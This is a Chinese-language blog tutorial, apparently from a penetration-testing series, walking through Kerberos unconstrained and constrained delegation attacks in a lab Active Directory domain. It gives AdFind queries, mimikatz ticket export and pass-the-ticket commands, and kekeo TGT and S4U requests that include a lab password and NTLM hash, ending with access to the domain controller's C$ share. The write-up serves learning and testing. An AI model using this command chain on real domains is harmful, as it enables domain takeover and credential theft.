当前位置: 首页 > news >正文

第135天:内网安全-横向移动非约束委派约束委派数据库攻防

news 2025/11/23 12:07:47

案例一:  横向移动-原理利用-非约束委派

该案例建立了解即可,真实环境应该不可能有人这样配置

非约束委派的原理和利用场景

原理:
机器 A (域控)访问具有非约束委派权限的机器 B 的服务,会把当前认证用户(域管用
户)的的 TGT 放在 ST 票据中,一起发送给机器 B ,机器 B 会把 TGT 存储在 lsass 进程
中以备下次重用。从而机器 B 就能使用这个 TGT 模拟认证用户(域管用户)访问服务。
利用场景
攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管
理员的 TGT ,从而模拟域管用户。

实验环境  god.org

配置环境

首先需要把webserver的computer中委派,设置为信任任何服务

利用这条命令进行更新

setspn -U -A priv/test webadmin

更新后在该用户的属性就会出现委派一栏

而别的用户中不会出现这一栏

msf上线并且提权到system权限

利用ADFIND工具进行查询非约束委派的账户

本来应该设置代理,在本地运行,但是我是linux系统我就直接上传了

adfind下载地址

https://www.softpedia.com/get/Programming/Other-Programming-Files/AdFind.shtml

 执行命令

AdFind.exe -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

让域控主机访问webadmin,正常应该是设置钓鱼

访问过以后让webserver利用mimikatz导出票据

mimikatz sekurlsa::tickets /export

利用管理员的身份伪造票据

mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;9eb18]-2-0-40e00000-Administrator@krbtgt-GOD.ORG.kirbi

 利用该身份就可以访问域控,记得用主机名去访问

案例二: 横向移动-原理利用-约束委派

非约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派,约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控

环境配置

然后点击确定,添加服务cifs

给对应的用户也添加上该服务环境配置完成

正常cs控制webserver,并且提权到了system权限后

查询域内设置了约束委派账户的命令

shell c:\users\webadmin\desktop\AdFind.exe -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

查询域内设置了约束委派机器的命令

shell AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

 利用kekeo去请求TGT

记得利用system权限去抓取mimikatz

明文:
shell kekeo "tgt::ask /user:webadmin /domain:god.org /password:admin!@#45" "exit"   hash值:
shell kekeo "tgt::ask /user:webadmin /domain:god.org /NTLM:579da618cfbfa85247acf1f800a280a4" "exit"

这里我还是直接上传,真实环境在本地设置代理,在本地运行

通过这刚刚生成的TGT伪造s4u请求以Administrator用户身份去访问域控的的CIFS的ST,S4U2Self 获取到的 ST1 以及 S4U2Proxy 获取到的 AD-2008 CIFS 服务的 ST2 会保存在当前⽬录下。

shell kekeo.exe "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/OWA2010CN-God.god.org" "exit"

利用mimikatz导入票据

mimikatz kerberos::ptt 
TGS_Administrator@god.org@GOD.ORG_cifs~OWA2010CN-God.god.org@GOD.ORG.kirbishell dir \\OWA2010SP3\c$

查看当前票据

 访问目标文件加夹

先写到这里后面还有一个综合性靶场以后再做把^_^


http://www.mrgr.cn/news/8998.html

相关文章:

  • 3b1b自注意力机制讲解记录
  • 每天一道C语言精选编程题之求字符串长度
  • 【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS
  • 攻破:重定向 缓冲区
  • DataFrame中各个列的数据类型,修改数据类型
  • RPC(Remote Procedure Call,远程过程调用)实现跨进程级别调用的原理
  • 云计算产业链图谱_产业链全景图_云计算行业市场分析
  • CSS文本【关于文本看这一篇就够了!!!】
  • 分享一个基于python的内蒙古旅游景点数据分析与采集系统(源码、调试、LW、开题、PPT)
  • 【Docker】Docker学习04 | dockerfile的编写
  • Programmatically add website content to OpenAI with C#
  • 8.20 pre day bug
  • 在windows项目中如何设计TCP网络单例模式
  • C++ //练习 19.18 编写一个函数,使用count_if统计在给定的vector中有多少个空string。
  • eureka原理实践
  • 鸿蒙卡片传值app到卡片
  • 具有手势识别的动捕设备——mHand Pro VR数据手套
  • RISC-V vector(1) --- vector的引入与register说明
  • 2024中国AI Agent行业研究报告(PPT 可编辑)+2024中国AI Agent市场研究报告
  • FreeRTOS 快速入门(八)之任务通知